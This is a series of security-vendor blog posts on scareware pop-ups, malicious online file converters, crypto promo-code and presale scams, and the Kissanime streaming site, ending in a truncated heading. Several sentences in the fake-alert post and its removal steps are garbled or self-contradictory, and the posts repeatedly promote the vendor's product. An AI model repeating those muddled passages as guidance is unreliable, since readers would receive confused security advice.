These fake warnings are part of a broader category of browser-based phishing attacks that exploit user fear and urgency. Unlike legitimate security warnings, these pop-ups are designed to manipulate you into making hasty decisions that benefit cybercriminals.

Threat Summary

What is a fake virus alert?

A fake virus alert is a deceptive message that appears on your screen, falsely claiming your system is infected with malware. These scareware pop-ups can appear in browsers, as system notifications, or even as fake desktop applications. They’re designed to create panic and pressure you into taking immediate action that benefits the scammers.

Unlike legitimate security warnings from your actual antivirus software, these fake alerts often use alarming language like “Critical threat!” or “Your computer is at risk of serious damage!” They’re commonly distributed through malicious browser notifications, compromised websites, and fake CAPTCHA pages.

How Fake Virus Alerts Work

These scams operate through several methods, all designed to exploit your natural concern for computer security:

• Rogue Antivirus Software: Fake security programs that display constant warnings about non-existent threats, demanding payment for “premium” protection
• Browser Pop-ups: Intrusive alerts that appear while browsing, often impossible to close without following their instructions
• System Tray Notifications: Fake warnings that mimic legitimate OS security alerts, appearing directly in your system notification area
• Tech Support Scams: Messages that provide phone numbers for “immediate technical assistance” from fake support teams

These fake alerts are closely related to other online scams like fake McAfee email alerts and Norton payment scams. The goal is always the same: create urgency and fear to bypass your critical thinking.

The psychology behind these scams is simple but effective. When people see warnings about computer viruses, they often panic and act without thinking. This emotional response is exactly what scammers count on to make their fake alerts successful.

Redirections appear when you click through some less than trustworthy pages. Compromised sites, or ones whose administrators do not care who they’re referring to, may contain several such malicious links. They are not a sign of malware, but unfortunately, that reason fake virus notifications are quite rare.

However, there are quite a lot of instances where they serve malicious purposes. The spreading of such plugins is pretty easy, and it makes them very attractive. Common ways look like advertising pages and require “install a plugin to confirm that you are not a robot” or “a security advisory”. They have become a popular method of spreading infection, as they are embedded in the browser and are often ignored by weak anti-viruses. In addition, they are aimed at stealing user data, which is very much present in the browser.

Signs of fake virus alerts

Fake virus alerts can be convincing, but there are several telltale signs that help you identify them. Understanding these warning signs can assist you in avoiding phony pop-up alerts and dangerous phishing links. Generally, trust your instincts: if something seems off, it probably is. These scams share similarities with fake Apple ID alerts and other social engineering attacks.

Here are the key red flags that indicate a fake virus alert:

• Fake-sounding products: Fake virus warnings are typically straightforward. They often promote fraudulent products. Learning about the best antivirus software will make it simple to recognize fraudulent software.
• High-frequency alerts: The sudden increase in warnings about the virus is alarming. However, this is a common tactic used by adware. The goal is to make you anxious enough to download their fraudulent product.
• Bad grammar: A legitimate corporation takes time to refine its messaging and communications. Fake virus software scams will often have spelling and grammar errors and also apply strange text designs – like numerous “#” or “_” symbols across the text.
• Vague wording: Unclear promises or vague descriptions are suspect. Reputable antivirus software will use straightforward language to describe its product and benefits.

The list of signs is not complete, as crooks have proven to be inventive enough to find new ideas on their banners. However, most of the time one or several symptoms among the names above will appear – and that should raise your suspicion.

Examples of fake virus alerts

A fake virus alert can have multiple forms. Understanding the following examples of virus warnings can assist you in recognizing scams before they have a chance to cause harm. These scams often work in conjunction with fake CAPTCHA attacks and other social engineering tactics. These are some examples:

1. Malvertisements

Malvertising is hackers’ deceptive usage of legitimate advertising networks to infect ads that show up on websites you trust. These ads often claim your computer is infected with a virus and attempt to sell bogus antivirus programs. Pay attention only if you receive notifications about your computer being infected with malware.

2. Fake versions of real ads

Reputable businesses can fake Virus Alerts and deceptive Counterfeit ads. Fake phonies use dubious claims and exaggerated language full of fear. They also offer absurdly favorable terms.

3. System tray notifications

As opposed to common fake virus warnings, system tray notifications are rare. They appear as notifications in your system tray that inform you of a serious infection that requires immediate attention. Authentic notifications have a much more effective effect because they look more realistic. When you see one, make sure it’s not a fake before you choose to respond. By examining the language of a scam alert, you can determine if it’s real or fake. These fraudulent messages use emotional words to manipulate your emotions and trick you into rash decisions. They also typically have formatting issues or fonts that need to match up.

How to Avoid Fake Virus Alerts

Prevention is always better than dealing with the aftermath. Here are essential steps to protect yourself from fake virus alerts and related online scams:

• Avoid unsecured websites: Stick to reputable sites with HTTPS encryption. Unsecured sites are more likely to host malicious ads and fake virus warnings.
• Use ad blockers: Quality ad blocking extensions can prevent malicious advertisements from appearing and reduce exposure to fake alerts.
• Keep software updated: Enable automatic updates for your operating system, browser, and security software to patch vulnerabilities that scammers exploit.
• Install reputable antivirus software: Legitimate antivirus programs can detect and block scareware before it affects your system.
• Be cautious with downloads: Only download software from official sources. Avoid suspicious email attachments and software from unknown developers.
• Learn about current threats: Stay informed about new scam tactics and emerging threats to recognize them quickly.

What to Do If You Interact with a Fake Virus Alert

If you’ve accidentally clicked on a fake virus alert or provided information to scammers, take these immediate steps:

• Change passwords: Update login credentials for all important accounts, especially if you entered any passwords.
• Enable two-factor authentication: Add extra security layers to prevent unauthorized access to your accounts.
• Monitor financial accounts: Watch for unauthorized transactions and contact your bank if you shared financial information.
• Run security scans: Use legitimate antivirus software to check for any malware that might have been installed.
• Consider identity protection: If you shared personal information, monitor your credit reports and consider placing fraud alerts.

How to remove a fake virus alert?

Step 1. Remove push notifications

If you encounter a fake virus alert, the first step is to shut down your browser. A key combination like Alt+F4 or Command+Q (on macOS), will accomplish the task. However, if this is not possible, you can force your system preferences to close your browser if it’s sluggish. This can help prevent you from tapping on the infected pop-up which can lead to further problems. Then, open it back to start troubleshooting.

If you subscribe to push notifications from scam sites, you can remove them through the browser interface. Go to your browser settings, find notification settings and remove all the sites that are listed as ones that can send notifications. Reload the browser to apply the changes.

Disabling browser pop-ups (scroll images)

Step 2. Remove any suspicious extensions.

Step 3. Reset browser settings

Resetting your browser settings is one of the first things you should do to eliminate the Windows Defender security warning scam. The following instructions tell you how to do this in different browsers:

Step 4. Remove suspicious apps

Find and remove the suspicious app: Now go to settings and click on the ‘Apps’ section. Look for a list of current apps (you may need to select ‘App manager’ for a comprehensive list) and locate the malicious app. Open the app’s information and then select the option to uninstall. This should eliminate suspicious apps.

If you can’t find the suspicious program in the list of all programs on your device, you need to scan your device with an antivirus. You must remove this designation before you can discontinue the procedure. To accomplish this, go into your security settings and locate a section called Device Admin Apps with a title “Device Admin Apps”. Uncheck the app you want to remove and then deactivate the next step. You may now be able to delete the app.

Step 5. Scan your PC for viruses

If you examine your computer and can’t find any suspicious files, you should consider installing antivirus software — this is if you don’t already have it. You can utilize the software to search for malware that may be concealed within your computer. If the scan identifies a threat, it can attempt to remove it and prevent further damage to your device.

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Stay Protected Against Fake Virus Alerts

Fake virus alerts prey on fear and urgency to bypass your critical thinking. By understanding how these scams work and recognizing their warning signs, you can protect yourself from becoming a victim. Remember that legitimate antivirus software doesn’t use scare tactics or demand immediate payment through pop-ups.

The key to staying safe is maintaining a healthy skepticism toward unexpected security warnings. When in doubt, close the suspicious pop-up and run a scan with your trusted antivirus software. This approach protects you from fake alerts while ensuring real threats are properly addressed.

Stay informed about current cybersecurity threats and scam tactics to keep yourself and others safe. Understanding how scammers operate helps build a stronger defense against their constantly evolving tactics.

Frequently Asked Questions

Do real antivirus programs send virus alerts?

Yes, legitimate antivirus software does send alerts when threats are detected. However, real alerts come from your installed security software, not random browser pop-ups. They provide specific details about the threat and don’t demand immediate payment or phone calls.

Can fake virus alerts actually install malware?

While the alert itself is fake, clicking on it can lead to real malware infections. Scammers use these fake warnings to trick you into downloading malicious software disguised as antivirus programs. This is similar to how fake GitHub repositories distribute malware.

Why do I keep getting fake virus alerts?

Repeated fake alerts usually indicate you’ve visited compromised websites, have malicious browser extensions installed, or your browser notifications are compromised. These alerts are also common if you’ve been exposed to browser hijacking malware.

How can I tell if a virus alert is real?

Real virus alerts come from your installed antivirus software, appear in the system tray or security center, and provide specific details about detected threats. They never demand immediate payment, phone calls, or browser downloads.

What should I do if I paid money to a fake virus alert scam?

Contact your bank or credit card company immediately to report the fraudulent charge. File a complaint with the FTC and monitor your accounts for additional unauthorized transactions. Consider this a learning opportunity about payment scams and similar fraud tactics.

Can mobile devices get fake virus alerts?

Yes, mobile devices can receive fake virus alerts through malicious websites and apps. These mobile scareware attacks are similar to iPhone calendar spam and other mobile-specific scams. Always be suspicious of unexpected security warnings on any device.

Related Articles

• Windows Defender Security Center Scam – Learn about fake Microsoft security alerts
• McAfee Email Scam – Recognize fake McAfee security notifications
• How to Remove McAfee Pop-ups – Remove persistent fake antivirus alerts
• iPhone Hacking Scam – Mobile device fake virus alerts
• Tech Support Scam Guide – Comprehensive guide to phone-based security scams

The post Fake Virus Alert – How to Spot and Remove Scareware Pop-ups appeared first on Gridinsoft Blog.

Online File Converter Scam Warning by FBI Denver

On March 7, 2025, the FBI Denver Field Office released a statement warning the public about a scam involving free online document converter tools. These tools, while converting files as advertised, often distribute malware, leading to serious issues like ransomware and identity theft, affecting users across the region. The FBI Denver also has highlighted that this is not a localized issue, but rather a global scheme orchestrated by cybercriminals worldwide. The agency has observed a noticeable increase in the number of these deceptive free online converters, signifying a growing trend in this type of cyberattack.

The methods employed by these cybercriminals involve offering seemingly legitimate free file conversion services that, in reality, deliver malicious software or exfiltrate uploaded information such as Social Security numbers, financial credentials, and cryptocurrency details. Cybercriminals creating fake online file converter websites that closely resemble legitimate tools.

These deceptive sites often mimic the appearance and functionality of popular platforms used for converting common file formats such as .pdf, .doc, and .jpg. They may also offer services such as combining multiple files into one, for instance, merging several .jpg images into a single .pdf document. Furthermore, some fraudulent sites masquerade as tools for downloading MP3 or MP4 media files from various online sources.

By employing sophisticated URL manipulation tactics and potentially paying for search engine advertisements, these fraudulent sites can appear at the top of search results, making them highly visible to users actively searching for online file conversion tools. Overall, this is a common tactic, with ads in google search results serving as a vector for the spread of malware.

How does the malware scheme operate?

The primary method by which these fake online file converters compromise users’ systems is by embedding malware within the converted file that the user subsequently downloads. Alarmingly, many of these fraudulent converters actually perform the advertised file conversion, leading victims to believe that the process was successful and legitimate. This functional aspect of the scam makes it pretty convincing, as users are less likely to suspect malicious activity if they receive the expected converted file.

In some instances, the cybercriminals may employ a slightly different tactic, encouraging users to download a separate software tool or a browser extension to facilitate the file conversion process. These seemingly helpful downloads, however, are often the vehicles through which malware is installed on the victim’s device.

Recent research suggests that the malware involved is often a loader-type malware, such as Gootloader, which is a JScript-based malware family leveraging SEO poisoning. Gootloader typically lures victims into downloading a ZIP archive that poses as a document, containing a JavaScript file. When executed, this file connects to a command and control server to download additional malware, such as infostealers or ransomware.

Another prevalent technique used by these fake converters is “scraping” the files that users upload for conversion. This involves the malicious website directly extracting personal information from the submitted files, such as Social Security numbers, passwords, and banking or cryptocurrency details, without necessarily relying on persistent malware installation.

This dual approach, combining malware installation with direct data theft, maximizes the potential for harm and financial gain for the attackers. The exploitation of search engine rankings further increases the chances of users encountering these malicious sites in the first place.

While the official FBI warning might not explicitly name specific malicious websites, as of now, some researchers have reported on examples. These examples include:

• Imageconvertors[.]com
• convertitoremp3[.]it
• convertisseurs-pdf[.]com
• convertscloud[.]com
• convertix-api[.]xyz
• convertallfiles[.]com
• freejpgtopdfconverter[.]com
• primeconvertapp[.]com
• 9convert[.]com

These are just a few sites, most of which are already non-functional. However, if you come across a suspicious site and doubt whether it is malicious or not, you can use our free URL scanner.

How to protect yourself?

While the use of the above methods is nothing new, we are now seeing a continuing trend of attackers using search advertising. Looking ahead, these deceptive tactics will continue to evolve. We can anticipate seeing more sophisticated methods of social engineering, involving artificial intelligence.

For users, the best approach is to cultivate a mindset of caution and skepticism. Prioritize using reputable software (not cracked) installed directly on your computer or well-known online services from trusted providers. Remember that if a service seems too good to be true, it probably is, and the convenience of a free online file converter might come at a significant cost to your security and privacy.

Given the nature of these threats, users should also consider enabling two-factor authentication for added security and regularly updating all software to patch vulnerabilities. A strong recommendation is to use anti-malware software like GridinSoft Anti-Malware, which excels at detecting and removing threats. Its Internet Security module and real-time protection provide protection against these file converter scams.p>

The post FBI Issues Online File Converter Malware Scam Warning appeared first on Gridinsoft Blog.

0.31 BTC Promo Code STICKS Overview

0.31 BTC Promo Code STICKS is yet another fraudulent scheme circulating on the internet that supposedly gives everyone 0.31 Bitcoin for just using a promo code. Because who doesn’t love the idea of magically acquiring 0.31 Bitcoin just by typing a code? This particular scam spreads across Instagram, TikTok, and YouTube. The fraudsters behind it promise free Bitcoin using the promo code “STICKS,” allegedly linked to none other than Elon Musk.

While Elon Musk regularly promotes all sorts of questionable subject on X/Twitter, 0.31 BTC Promo Code STICKS is an obvious fraud, and has nothing to do with the aforementioned character. The scam is gaining traction through short, eye-catching videos that showcase a seemingly effortless process: enter the promo code, and Bitcoin appears in your account, ready to withdraw. Except, not really.

The scam operates through a fraudulent website called TWXBit, which, like many before it, exists solely to lure users into making a deposit they’ll never see again. By the way, we have a review for a completely similar scheme but with a different promo code. Similar to the above example, the site maintains an illusion of legitimacy with a polished interface and instant “rewards.”

However, when users attempt to cash out the crypto promised in 0.31 BTC Promo Code scam, they encounter a predictable obstacle: their accounts require “activation” through a deposit. And just like that, the con artists have pocketed your hard-earned money while you stare at a frozen balance that will never move.

How Does It Work?

The scam follows a straightforward but effective pattern. We also have a separate post about this, I recommend reading it. However, all starts with a well-crafted bait – an enticing video showing someone entering the “STICKS” promo code and receiving instant Bitcoin. The videos appear across multiple social media platforms, designed to go viral and hook unsuspecting victims. Is it worth mentioning once again that all these celebrity videos are fake. They are either slices of old videos with overlaid audio/subtitles or completely neural network generated videos.

Once a user follows the link in the video description, they land on TWXBit’s website, where they’re prompted to create an account. In fact, there are millions of such sites, and as I have already mentioned many times – they work on the same scheme. Everything appears legitimate, with a sleek design and a seemingly active platform. Upon logging in, the user enters the promo code, and the site immediately displays a Bitcoin balance. At this point, it looks like the real deal.

But when the user attempts to withdraw their “free” Bitcoin, the scam kicks into high gear. A message appears stating that their account must be activated first by making a deposit – conveniently, just a fraction of the Bitcoin they were promised. The website assures them this is a standard security measure to prevent bots and fake users. It sounds reasonable enough, so the victim transfers the money, expecting to unlock their funds.

Instead, they receive yet another message: their account now requires additional verification, usually in the form of another deposit. The more they comply, the deeper they sink into the scam. Eventually, they either realize they’ve been had or keep paying until their funds run dry. Either way, the scammers win, and the victim walks away with nothing but regret.

Why Is 0.31 BTC Promo Code Scam Dangerous?

Beyond the immediate financial loss, these scams come with another layer of danger – data theft. The registration process requires users to submit personal information, including email addresses, passwords, and sometimes even phone numbers. Scammers don’t just steal money; they also harvest these details for future attacks.

Once collected, this information often gets sold on dark web marketplaces, where cybercriminals use it for phishing, identity theft, and other malicious activities. The more widespread a user’s compromised data becomes, the greater the risk of falling victim to further scams or account takeovers.

And let’s not forget the potential for password reuse – if someone uses the same password across multiple accounts, they’ve just handed cybercriminals access to those as well. I have also detailed what passwords should be in a separate post.

To make matters worse, security tools like VirusTotal and our online scanner have already flagged TWXBit as malicious. In short, victims don’t just lose money; they risk losing control over their personal data and online security.

What Can I Do After Getting Scammed?

Unfortunately, once money is sent to these scammers under the course of 0.31 BTC Promo Code fraud, recovering it is nearly impossible. Cryptocurrency transactions are irreversible by design, making them a favorite tool for fraudsters. However, there are still a few damage-control steps to take.

First, report the video to the platform where you found it – whether that’s Instagram, TikTok, or YouTube. While this won’t get your money back, it can help prevent others from falling into the same trap. Next, contact the exchange or wallet service you used to send the funds and inform them of the fraudulent transaction. While they can’t reverse the transaction, they may flag the recipient’s wallet address and prevent further transactions to it.

Since scams like these often involve credential harvesting, it’s critical to change any passwords associated with the account you used to sign up. If you reused that password elsewhere (which, let’s be honest, many people do), change it on those accounts as well. Enabling two-factor authentication (2FA) is also a smart move to add an extra layer of security.

Lastly, ignore any messages from so-called “recovery experts” promising to get your funds back for a fee. These are just scammers on top of scammers, preying on desperate victims. If you engage with them, you’ll likely end up losing even more money.

The best defense against these scams? Awareness. If an offer seems too good to be true – especially when it involves free Bitcoin – chances are, it’s a scam. Stay skeptical, stay informed, and don’t let videos and fake celebrity names fool you.

The post 0.31 BTC Promo Code STICKS appeared first on Gridinsoft Blog.

0.31 BTC Promo Code GRANTX Overview

If you’ve ever dreamed of getting free Bitcoin just by entering a promo code, congratulations! You’re exactly the kind of person scammers are hoping to find. The latest scheme circulating on social media, Xistrade.com, promises users a generous 0.31 BTC for simply registering and using the promo code GRANTX. Sounds too good to be true? That’s because it is.

The website makes up the story about the funds being instantly credited to your account. The thing is – the moment one tries to withdraw the “prize”, they get hit with a classic bait-and-switch tactic: you need to “activate” your account by depositing real Bitcoins first. And once you do, forget about ever owning these money. The scammers vanish, leaving you with an empty wallet and a newfound distrust of online crypto giveaways.

This scam is aggressively promoted across all the major social media, and even messaging apps like Telegram and WhatsApp. However, unlike other scams I’ve written about, 0.31 BTC Promo Code GRANTX scam is most often promoted through TikTok rather than X/Twitter.

Criminals use short videos, typically featuring deepfakes or misleading edits of famous figures like Elon Musk, to make the scheme seem legitimate. The goal is simple – trick users into thinking they’re getting something for free, only to steal their funds through fabricated activation fees.

How Does It Work?

As many others, at its core, 0.31 BTC Promo Code GRANTX, along with its website, Xistrade.com, operate as a social engineering scam exploiting human greed and trust in online promotions. Another key indicator of fraud is the use of fake celebrity endorsements. One of the signature moves is the use of fake celebrity endorsements, cobbled together with generative AI.

Scammers leverage deepfake technology or recycle old footage of tech moguls like Elon Musk, Jeff Bezos, or Bill Gates. They slap on some AI-generated audio or misleading captions, making it seem like these billionaires have personally decided to hand out crypto to random internet strangers.

These videos are then spread across social media, targeting users who are more likely to believe in the legitimacy of a promotion when it appears to have the backing of a tech billionaire. The website is designed to mimic a real cryptocurrency exchange, complete with a professional-looking interface, fake account balances, and a seemingly functional deposit and withdrawal system. However, everything beyond the deposit function is an illusion.

Withdrawal Restrictions & Top-Up Demand

The moment users attempt to withdraw their so-called free Bitcoin, they encounter a fabricated restriction. To proceed, they are required to deposit a small amount first – typically around 0.0025 to 0.005 BTC. This is a psychological trick known as the sunk cost fallacy. Victims, having already invested time into the process, feel compelled to send the deposit in hopes of unlocking their funds. However, it won’t.

The site’s backend is programmed to generate dynamic wallet addresses for each victim. This ensures that transactions cannot be easily traced back to a single source. These addresses are controlled by the scammers, who can immediately transfer funds elsewhere once a deposit is made. Unlike legitimate exchanges that implement multi-signature wallets and withdrawal verification processes, Xistrade.com has no such security measures because its sole purpose is to steal money.

The domain’s WHOIS data is deliberately obfuscated, a common tactic used by many site owners, both legit and fraudulent. Additionally, its association with over a thousand other fraudulent domains suggests the use of automated tools to generate and deploy scam websites en masse. These sites often share identical templates but differ in branding and promotional codes.

All this allows crooks to quickly replace one domain with another once authorities catch on. Our URL scanner identified over 1k structurally similar websites linked to Xistrade.com, indicating a widespread scam network designed to repeatedly target victims under different names.

Personal Data Sharing

Beyond the financial loss, falling for such scams can have additional consequences. Users who register on these sites typically hand over their email addresses and phone numbers, which are then harvested and sold on the dark web. This can lead to further phishing attempts, identity theft, and even targeted ransomware attacks.

Some victims reported that after engaging with scam offers like 0.31 BTC Promo Code GRANTX, they began receiving calls from fake “crypto recovery services.” These fraudsters promised to retrieve stolen funds – for yet another fee, of course.

Thus, Xistrade.com and similar scams thrive on the desperation of individuals looking for quick financial gains. The promise of free Bitcoin is nothing more than a lure to extract real cryptocurrency from unsuspecting users. No legitimate exchange gives away free money without a verifiable and transparent process.

What can I do After Getting Scammed?

Your first step is to report the 0.31 BTC Promo Code GRANTX scam to authorities. Contact your crypto exchange if you made the deposit from a legitimate platform—they might be able to flag the transaction, though refunds are unlikely. You should also report Xistrade.com to authorities like the FTC, your country’s cybercrime unit, and cryptocurrency fraud reporting platforms. The more reports they receive, the faster they can take down the scam (before it inevitably reappears under a slightly different name).

Next, secure your accounts. If you used the same email and password on Xistrade.com as you do elsewhere, change your credentials immediately. Scammers often sell stolen login details on the dark web, meaning your email could soon be flooded with phishing attempts—or worse, your accounts could be hijacked. Enable two-factor authentication (2FA) wherever possible to add an extra layer of security.

If you provided personal details, be on high alert for follow-up scams. Fraudsters love to double-dip, and as I said above, they are often pretending to be “crypto recovery experts” or even law enforcement officials offering to help for a fee. Ignore these attempts and never send more money.

The post 0.31 BTC Promo Code GRANTX Scam Overview appeared first on Gridinsoft Blog.

X Token Presale Scam Overview

The X Token Presale scam is a deceptive scheme targeting cryptocurrency enthusiasts by promising early access to a revolutionary token at a discounted price. In brief, fraudsters create convincing fake websites and promotional materials to lure investors into transferring their cryptocurrency.

This scam takes advantage of the growing popularity of token presales, dirty promotion methods, and names/symbolism that are on everyone’s lips. While in our case it’s consonance with X (formerly Twitter), it doesn’t add credibility to this scam.

Continuing with the theme of X, interestingly, there is also a legitimate project called “X Project” with a token named X-TOKEN. The real one positions itself as a DeFi initiative with features like a multichain wallet, decentralized exchange, and NFT marketplace. Maybe its name has been exploited by scammers to add credibility to their fraudulent operations.

How Does It Work?

Like many others, the X Token Presale scam operates through a combination of social engineering and technical manipulation. A key aspect of this scam is its connection to X/Twitter as a social media platform and its owner, Elon Musk, widely known for being an outstanding crypto optimist. That is one of the reasons why this social network serves as the primary source of advertising for this scam. As if X didn’t already have a sterling reputation for being a hotbed of scams and bots, this incident truly elevates it to a new level.

Most accounts promoting this scam are hacked in one way or another, with their owners unaware that their X accounts were being exploited for X Token Presale scam spreading. The campaign’s duration suggests a lack of urgent action from the platform moderators in addressing the issue, as some of the spam-distributing accounts even had blue ticks.

Upon clicking the X presale scam ads, users are redirected to websites designed to mimic reputable news outlets. These sites are complete with fabricated articles detailing the launch of the new cryptocurrency and offering access to a “private presale”. Such pages are meticulously crafted, featuring professional designs and persuasive language to lure potential investors.

To participate, users are prompted to create an account, providing personal information and setting up login credentials. Once registered, they see the offer to invest by purchasing the fictitious cryptocurrency, with payment required in established cryptocurrencies like Ethereum.

The minimum investment amount is often substantial, around $900, and transactions are directed to a recently established wallet, so the funds recovery is impossible. Sure enough, nothing says “foolproof investment” like wiring $900 to an anonymous wallet.

The scam employs several technical tactics to enhance its credibility. Among others, domain names that closely resemble legitimate websites related to the crypto industry, reducing suspicion among potential victims. High-quality graphics, layouts, and user interfaces are also utilized to create a sense of legitimacy and trustworthiness. Although after investing, users can log in to view their balance and transaction history, all of which are fictitious and designed to reinforce the illusion of a legitimate investment.

In some iterations of the scam, the perpetrators offered implausible incentives to entice larger investments, such as personalized investment advice from Elon Musk via WhatsApp or entries into raffles to win trips to Mars or Neuralink brain chips. Feels like Nigerian prince scam on steroids and after a healthy bit of modernization.

Red Flags

To avoid becoming a victim of x token presale scam, it is important to know red flags and be able to spot it.

Too-Good-To-Be-True Promises. First, offers of guaranteed returns or exclusive access to presales with minimal risk are classic scam tactics. Remember, in the crypto world, high rewards always come with high risks.

Unverified Endorsements. Scammers often use fake endorsements from celebrities or influencers. In the age of AI, Dark LLM, deepfake and other tools, it’s easy. So, if Elon Musk is suddenly offering you personalized advice via WhatsApp, you’re probably not about to get rich – unless you’re the scammer.

Urgency and Pressure. The human factor is the weakest link in the chain of defense against cyberattacks, so social engineering is a fail-safe weapon against the average Internet user. Scams frequently employ countdown timers or claims of limited availability to push victims into making hasty decisions. Take your time; the internet isn’t going anywhere.

Suspicious Websites. Check for signs of spoofed domains or poorly written content. Although scammers are now paying more attention to the last one, most crypto scam sites are made by a template. Legitimate platforms invest in professional communication and secure web infrastructure.

Payment in Crypto Only. Most cryptocurrency buying platforms support multiple payment methods. Demands for payment exclusively in cryptocurrency, especially to anonymous wallets, should raise immediate red flags.

How to Protect Yourself

Research Thoroughly. Before investing in any project, verify its legitimacy by researching the team, whitepaper, and community feedback. If a project has no credible online presence, steer clear.

Check URLs Carefully. Always ensure the website you’re visiting is authentic. Look for sites established more than several weeks ago and avoid links from unsolicited messages. Also avoid such articles on Telegra.ph, as anyone can post anything there.

Beware of Impersonators. Be cautious of unsolicited messages or posts from accounts claiming to represent celebrities or major platforms. Verify the authenticity of such claims through official channels. Although the case of Trump and trump coin calls this point into question, I recommend not ignoring it.

Enable Security Measures. I emphasize this in almost every post, but unfortunately, it still has a necessity. You should protect your accounts with strong passwords and two-factor authentication to prevent hackers from exploiting them.

The post X Token Presale Scam appeared first on Gridinsoft Blog.

Kissanime Safety Analysis: The Verdict

Our security analysis conclusively determines that Kissanime is unsafe and should be avoided by anyone seeking anime content online. Despite its attractive offering of free, diverse anime content without subscription requirements, the site exhibits multiple high-risk behaviors that pose significant threats to users’ cybersecurity and privacy.

Our assessment is supported by multiple technical analyses, extensive user reports across forums like Reddit, and verification through website security services. Let’s examine each risk factor in detail to understand the full scope of threats this platform presents.

Dangerous Advertising Ecosystem

Predatory Ad Content

The most immediately visible security threat on Kissanime is its aggressive implementation of malicious advertising. Unlike legitimate sites that employ standard advertising networks, Kissanime’s ad ecosystem displays hallmarks of deliberately harmful implementation:

• High-risk ad categories: Predominance of adult content, unregulated gambling operations, misleading “free” games, and fraudulent dating services
• Geographic targeting: Ads dynamically change based on user location to maximize relevance for scam potential
• Intentional misplacement: Deceptive positioning of ads to resemble navigation elements or video players, tricking users into clicking
• Circumvention techniques: Implementation of methods specifically designed to bypass standard ad blockers

These advertisements aren’t merely annoying—they serve as entry points to sophisticated scam operations. Many redirect to phishing pages designed to capture credit card information, install malware, or trick users into paying for fraudulent services.

Data Harvesting Operations

Beyond visible ads, our technical analysis uncovered extensive data collection scripts operating in the background on Kissanime. These scripts engage in what security professionals call “traffic cloaking”—a technique that harvests user data without consent while obscuring this activity from detection.

The collected data typically includes:

• Browsing patterns and history
• Device information and identifiers
• IP addresses and geolocation data
• Browser fingerprinting data
• Cross-site tracking identifiers

This information is then aggregated and sold to data brokers, who further distribute it to questionable third parties without user knowledge or consent. This practice represents a serious privacy violation and increases users’ vulnerability to targeted scams.

Forced Redirections and Social Engineering

Perhaps the most dangerous aspect of Kissanime is its aggressive implementation of forced browser redirections. Our testing revealed that normal navigation actions (clicking on content, menu items, or even empty space) frequently trigger the opening of new browser tabs containing highly deceptive content.

Common Malicious Redirect Tactics

Through repeated testing, we identified several patterns in these forced redirections:

1. Fake video player overlays that mimic legitimate streaming interfaces but contain hidden redirect triggers
2. False update notifications claiming users need a “special player” or codec to view content
3. Counterfeit human verification systems that request users to complete tasks to “prove they’re human”
4. QR code scanning requirements that lead to malware distribution sites
5. Browser extension installation prompts for supposed “required viewing tools”

These tactics employ social engineering principles to manipulate users into performing actions that compromise their security. Particularly concerning are the fake human verification systems that have become increasingly sophisticated and convincing.

Domain-Hopping and Identity Theft

Another significant red flag in our security assessment is Kissanime’s frequent domain changes and name appropriation practices. Unlike legitimate services that maintain stable web addresses, Kissanime operates across multiple rapidly-changing domains—a classic evasion tactic used by malicious websites to circumvent blocking and takedowns.

Documented Domain Variations

Our monitoring has identified numerous domain variations used by this operation in recent years:

• kissanime.help
• kissanimes.net
• kissanime.com.ru
• kissanime.com
• kissanime.com.tr
• kiss-anime.net
• kiss-anime.ws

This constant domain shifting serves multiple malicious purposes:

• Evading website blocklists maintained by security companies
• Circumventing DMCA takedown actions for copyright infringement
• Escaping user-reported blocks on forums and social media
• Avoiding accumulation of negative reputation on any single domain

Brand Impersonation Tactics

Particularly concerning is the site’s deliberate impersonation of the original KissAnime service that operated legitimately in the early 2010s but has since shut down. This represents a form of brand theft designed to capitalize on the original site’s reputation and user trust.

Our investigation into the site’s history reveals that it previously operated under the GoGoAnime brand (as admitted in the website’s own footer), which itself had accumulated a negative security reputation. The operation simply rebranded to Kissanime to escape this reputation while benefiting from name recognition of a defunct legitimate service.

Reddit discussions from the anime community confirm that the original KissAnime service permanently ceased operations and has no connection to current sites using this name.

How to Verify Website Safety

To help users independently verify the safety of Kissanime or any questionable website, we recommend utilizing specialized website security checking tools before visiting potentially malicious domains.

GridinSoft Website Reputation Checker Results

When analyzing kissanimes.net using GridinSoft’s Website Reputation Checker, the results confirmed our security assessment. The service identified kissanimes.net as having poor reputation scores across multiple security vendors, with specific flags for:

• Malicious advertising implementation
• Suspicious redirect behaviors
• Potential malware distribution
• Privacy policy violations

This free tool provides a quick way to verify website safety before visiting potentially dangerous sites. Simply enter any suspicious URL into the Website Reputation Checker to receive a comprehensive safety assessment within seconds.

Protecting Yourself From Adware and Browser Hijackers

If you’ve already visited Kissanime or similar sites, you may have inadvertently exposed your system to various forms of malware, particularly adware and browser hijackers. These malicious programs can cause symptoms similar to what you’d experience on Kissanime itself:

• Unexpected browser redirections on legitimate websites
• Excessive popup advertisements
• New toolbars or extensions you don’t remember installing
• Changed browser homepage or search engine
• Slower than normal browser performance

Preventative Measures

To protect yourself from these threats, implement these security practices:

1. Use reputable ad-blocking extensions like uBlock Origin or AdGuard to prevent malicious advertising
2. Install script-blocking extensions such as NoScript or ScriptSafe to prevent unwanted code execution
3. Regularly audit browser extensions and remove any you don’t recognize or need
4. Maintain updated browsers to benefit from the latest security patches
5. Consider using a dedicated malware scanner to detect and remove browser threats

For comprehensive protection, we recommend GridinSoft Anti-Malware, which offers specialized detection for browser-based threats like those distributed through sites like Kissanime. Its network security module provides real-time protection against malicious websites and can clean existing infections that may have already compromised your system.

Safe Alternatives for Anime Streaming

Rather than risking your security with sites like Kissanime, consider these legitimate alternatives for anime content:

• Crunchyroll – Offers substantial free content with ads, plus premium subscriptions
• Funimation – Specializes in dubbed anime with both free and premium tiers
• Netflix – Increasingly expanding its anime catalog with exclusive titles
• Hulu – Features a growing selection of both classic and current anime
• Amazon Prime Video – Includes anime content within its standard subscription
• HiDive – Specialized anime streaming service at affordable price points

While these services typically require payment for full access, they provide legal, high-quality content without exposing users to security risks. Many offer free trials or ad-supported tiers that allow limited viewing without payment.

Frequently Asked Questions

The post Is Kissanime Safe? A Security Analysis (2025 Update) appeared first on Gridinsoft Blog.

What is Softonic?

